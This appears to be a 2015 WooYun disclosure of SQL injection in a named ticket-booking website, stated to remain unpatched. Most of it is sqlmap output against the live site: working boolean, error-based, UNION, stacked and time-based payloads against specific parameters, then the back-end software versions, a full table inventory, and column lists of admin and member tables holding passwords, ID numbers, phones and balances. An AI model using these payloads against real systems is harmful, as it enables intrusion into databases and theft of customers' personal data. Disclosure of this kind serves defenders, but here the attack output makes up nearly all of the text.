WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader ------------------ http://drop.zone.ci/
2015-11-05: Actively contacting the vendor and waiting for the vendor to claim the report; details withheld from the public.
2015-12-20: The vendor has actively ignored the vulnerability; details are now disclosed to the public.
I searched; this shouldn't be a duplicate submission!~~~
First, the URL is:
http://www.51piao.com/Ticket/TicketList.aspx?cityid=157&ticketaddrid=&tickettypeid=2&ticketdays=&ticketprice=&name=&style=&sort=3&price1=&price2=&day1=&day2=
Several parameters are injectable: cityid, ticketaddrid and name.
http://www.51piao.com/Ticket/TicketList.aspx?cityid=157'&ticketaddrid=&tickettypeid=2&ticketdays=&ticketprice=&name=&style=&sort=3&price1=&price2=&day1=&day2=
The response to the test request:
Server Error in '/' Application. Line 1: Incorrect syntax near ') And (TicketTypeId='. Unclosed quotation mark before the character string ') And TicketTypeId<>31 order by [BeginDate] asc'. Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code. Exception Details: System.Exception: Line 1: Incorrect syntax near ') And (TicketTypeId='. Unclosed quotation mark before the character string ') And TicketTypeId<>31 order by [BeginDate] asc'.
So that should be an injection!~~~
sqlmap identified the following injection points with a total of 509 HTTP(s) requests:
---
Place: GET
Parameter: cityid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cityid=157) AND 6477=6477 AND (9107=9107&ticketaddrid=&tickettypeid=2&ticketdays=&ticketprice=&name=&style=&sort=3&price1=&price2=&day1=&day2=

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: cityid=157) AND 6063=CONVERT(INT,(SELECT CHAR(113)+CHAR(110)+CHAR(119)+CHAR(109)+CHAR(113)+(SELECT (CASE WHEN (6063=6063) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(115)+CHAR(102)+CHAR(113))) AND (1862=1862&ticketaddrid=&tickettypeid=2&ticketdays=&ticketprice=&name=&style=&sort=3&price1=&price2=&day1=&day2=

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: cityid=-1157) UNION ALL SELECT CHAR(113)+CHAR(110)+CHAR(119)+CHAR(109)+CHAR(113)+CHAR(87)+CHAR(70)+CHAR(74)+CHAR(121)+CHAR(88)+CHAR(106)+CHAR(79)+CHAR(119)+CHAR(78)+CHAR(97)+CHAR(113)+CHAR(107)+CHAR(115)+CHAR(102)+CHAR(113)-- &ticketaddrid=&tickettypeid=2&ticketdays=&ticketprice=&name=&style=&sort=3&price1=&price2=&day1=&day2=

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: cityid=157); WAITFOR DELAY '0:0:5'--&ticketaddrid=&tickettypeid=2&ticketdays=&ticketprice=&name=&style=&sort=3&price1=&price2=&day1=&day2=

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: cityid=157) WAITFOR DELAY '0:0:5'--&ticketaddrid=&tickettypeid=2&ticketdays=&ticketprice=&name=&style=&sort=3&price1=&price2=&day1=&day2=

Place: GET
Parameter: name
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cityid=157&ticketaddrid=&tickettypeid=2&ticketdays=&ticketprice=&name=%' AND 4525=4525 AND '%'='&style=&sort=3&price1=&price2=&day1=&day2=

Place: GET
Parameter: ticketaddrid
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: cityid=157&ticketaddrid=(SELECT CHAR(113)+CHAR(110)+CHAR(119)+CHAR(109)+CHAR(113)+(SELECT (CASE WHEN (7962=7962) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(115)+CHAR(102)+CHAR(113))&tickettypeid=2&ticketdays=&ticketprice=&name=&style=&sort=3&price1=&price2=&day1=&day2=
---
there were multiple injection points, please select the one to use for following injections:
[0] place: GET, parameter: cityid, type: Unescaped numeric (default)
[1] place: GET, parameter: ticketaddrid, type: Unescaped numeric
[2] place: GET, parameter: name, type: Single quoted string
[q] Quit
> 0
[23:39:41] [INFO] testing Microsoft SQL Server
[23:39:41] [INFO] confirming Microsoft SQL Server
[23:39:42] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2000
Database: www_51piao_com
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| dbo.OrderLog            | 960530  |
| dbo.TicketPrice         | 370802  |
| dbo.vMemberAll          | 341320  |
| dbo.vTicketPrice        | 248386  |
| dbo.MemberAddrBook      | 205920  |
| dbo.Member              | 198769  |
| dbo.vMember             | 198769  |
| dbo.OrderMain           | 179354  |
| dbo.OprLog              | 178047  |
| dbo.vEmailAll           | 130008  |
| dbo.MemberPointLog      | 126478  |
| dbo.TicketOrderDetail   | 124531  |
| dbo.vTicketOrderStat    | 124531  |
| dbo.vFlightTicketOrder  | 121509  |
| dbo.SmsLog              | 110875  |
| dbo.TicketOrder         | 105987  |
| dbo.vTicketOrder        | 105987  |
| dbo.vMobileTemp         | 98091   |
| dbo.vMoibleAll          | 98091   |
| dbo.vMobileAllOrder     | 98081   |
| dbo.vMemberTemp         | 93102   |
| dbo.MemberMoneyLog      | 81837   |
| dbo.TicketPlay          | 81605   |
| dbo.VTicketPlayMag      | 81559   |
| dbo.FlightLog           | 72994   |
| dbo.TrainNew            | 70195   |
| dbo.vLoginLog           | 58650   |
| dbo.ImagesTicket        | 37724   |
| dbo.monitor             | 36593   |
| dbo.FlightOrderDetail   | 31300   |
| dbo.vFlightOrderDetail  | 21042   |
| dbo.FlightOrder         | 15522   |
| dbo.vFlightOrder        | 15522   |
| dbo.Ticket              | 14240   |
| dbo.vTicket             | 14124   |
| dbo.vTicketDetail       | 14124   |
| dbo.vTicketMag          | 14124   |
| dbo.OrderPayCard        | 13596   |
| dbo.vOrderPayCard       | 13596   |
| dbo.MemberLog           | 11971   |
| dbo.vFlightTicketSend   | 10293   |
| dbo.AccountAll          | 8329    |
| dbo.TicketPreOrder      | 6289    |
| dbo.vTicketAddrUse      | 5215    |
| dbo.FlightLogStat       | 2756    |
| dbo.TicketReview        | 2220    |
| dbo.vTicketReviewList   | 1808    |
| dbo.FlightKM            | 1398    |
| dbo.o_kehu              | 1317    |
| dbo.ImagesCommon        | 860     |
| dbo.WebTop              | 858     |
| dbo.JOYCOMPANY          | 786     |
| dbo.vJoyCompany         | 786     |
| dbo.VJoyCompanyMag      | 786     |
| dbo.LinkInfo            | 780     |
| dbo.CITY                | 647     |
| dbo.AgentInfo           | 526     |
| dbo.VChinaCity          | 455     |
| dbo.NewsHelp            | 431     |
| dbo.vNewsHelp           | 416     |
| dbo.VNewsHelp1          | 416     |
| dbo.PointProductOrder   | 293     |
| dbo.vTicketBig          | 280     |
| dbo.vTicketHomeTop      | 279     |
| dbo.MemberWebUnion      | 210     |
| dbo.vTicketLeft         | 176     |
| dbo.vTicketSmall        | 155     |
| dbo.FlightCityCode      | 152     |
| dbo.FlightSale          | 144     |
| dbo.VFlightSale         | 141     |
| dbo.Area                | 131     |
| dbo.Users               | 116     |
| dbo.vUserMag            | 116     |
| dbo.BlackIp             | 103     |
| dbo.REGION              | 96      |
| dbo.PointProduct        | 84      |
| dbo.TrainTrade          | 65      |
| dbo.vTrainTrade         | 65      |
| dbo.TrainTradeBak       | 60      |
| dbo.NewsHelpModule      | 57      |
| dbo.sysconstraints      | 54      |
| dbo.vPointProduct       | 44      |
| dbo.vPointProduct1      | 44      |
| dbo.TravelLine          | 35      |
| dbo.vTravelLine         | 35      |
| dbo.VTravelLine1        | 35      |
| dbo.vTravelLineDetail   | 35      |
| dbo.Province            | 34      |
| dbo.vMobileAllTrain     | 26      |
| dbo.vTicketTypeCount    | 22      |
| dbo.TempSql             | 17      |
| dbo.vJoyCompanyTop      | 17      |
| dbo.TicketType          | 14      |
| dbo.vTicketType         | 14      |
| dbo.OrderPayMethod      | 12      |
| dbo.FlightSpec          | 11      |
| dbo.vFlightSpec         | 11      |
| dbo.MemberGroup         | 10      |
| dbo.SmsTemplate         | 10      |
| dbo.vSmsTemplate        | 10      |
| dbo.vTemp               | 10      |
| dbo.BaseCreditCard      | 9       |
| dbo.WebModule           | 9       |
| dbo.vWebCity            | 8       |
| dbo.WebCity             | 8       |
| dbo.BlackList           | 7       |
| dbo.SmsEvent            | 7       |
| dbo.BbsBanner           | 6       |
| dbo.Groups              | 6       |
| dbo.OrderFlightTakeAddr | 6       |
| dbo.PointProductType    | 5       |
| dbo.vHomeTicket         | 5       |
| dbo.vSmsModule          | 5       |
| dbo.HotelOrder          | 4       |
| dbo.vHotelOrder         | 4       |
| dbo.syssegments         | 3       |
| dbo.BaseYesNo           | 2       |
| dbo.FlightTicketAddr    | 2       |
| dbo.PriceType           | 2       |
| dbo.CompanySeq          | 1       |
| dbo.FlightSaleTop       | 1       |
| dbo.OrderSeq            | 1       |
| dbo.TravelCompany       | 1       |
+-------------------------+---------+

+-------------------------+---------+
| dbo.Member              | 198769  |
| dbo.vMember             | 198769  |
| dbo.Users               | 116     |
| dbo.vUserMag            | 116     |
+-------------------------+---------+

Database: www_51piao_com
Table: Users
[9 columns]
+---------------+
| Column        |
+---------------+
| Account       |
| ID            |
| IsDisabled    |
| LastLoginTime |
| LEVELID       |
| LoginCount    |
| Password      |
| PurView       |
| UserName      |
+---------------+

Database: www_51piao_com
Table: vUserMag
[10 columns]
+---------------+
| Column        |
+---------------+
| Account       |
| DepartName    |
| ID            |
| IsDisabled    |
| LastLoginTime |
| LEVELID       |
| LoginCount    |
| Password      |
| PurView       |
| UserName      |
+---------------+

Database: www_51piao_com
Table: Member
[43 columns]
+---------------+
| Column        |
+---------------+
| Account       |
| Address       |
| Balance       |
| BirthDay      |
| CardNo        |
| CardType      |
| CityId        |
| COMPANYADDR   |
| CompanyId     |
| CompanyName   |
| COMPANYTEL    |
| CompanyType   |
| Degree        |
| Email         |
| FAX           |
| GroupId       |
| ID            |
| ISAuditing    |
| IsBindMobile  |
| IsChinese     |
| IsDesignWeb   |
| IsDisabled    |
| IsMailList    |
| IsWeb         |
| LastLoginTime |
| LoginCount    |
| MemberType    |
| MEMO          |
| MOBILE        |
| Name          |
| NickName      |
| openid        |
| POINT         |
| ProvinceId    |
| Pwd           |
| RegDate       |
| SEX           |
| STAFFID       |
| STAFFNAME     |
| TEL           |
| VipMoney      |
| VipNo         |
| ZIPCODE       |
+---------------+

Database: www_51piao_com
Table: vMember
[45 columns]
+---------------+
| Column        |
+---------------+
| Account       |
| Address       |
| Balance       |
| BirthDay      |
| CardNo        |
| CardType      |
| City          |
| CityId        |
| COMPANYADDR   |
| CompanyId     |
| CompanyName   |
| COMPANYTEL    |
| CompanyType   |
| Degree        |
| Email         |
| FAX           |
| GroupId       |
| GroupName     |
| ID            |
| ISAuditing    |
| IsBindMobile  |
| IsChinese     |
| IsDesignWeb   |
| IsDisabled    |
| IsMailList    |
| IsWeb         |
| LastLoginTime |
| LoginCount    |
| MemberType    |
| MEMO          |
| MOBILE        |
| Name          |
| NickName      |
| openid        |
| POINT         |
| ProvinceId    |
| Pwd           |
| RegDate       |
| SEX           |
| STAFFID       |
| STAFFNAME     |
| TEL           |
| VipMoney      |
| VipNo         |
| ZIPCODE       |
+---------------+
The data set is quite large, so I'll stop here!~~~~
As above.
Filter the input and fix it!~~~
Unable to contact the vendor, or the vendor actively refused.
Vulnerability Rank: 15 (WooYun rating)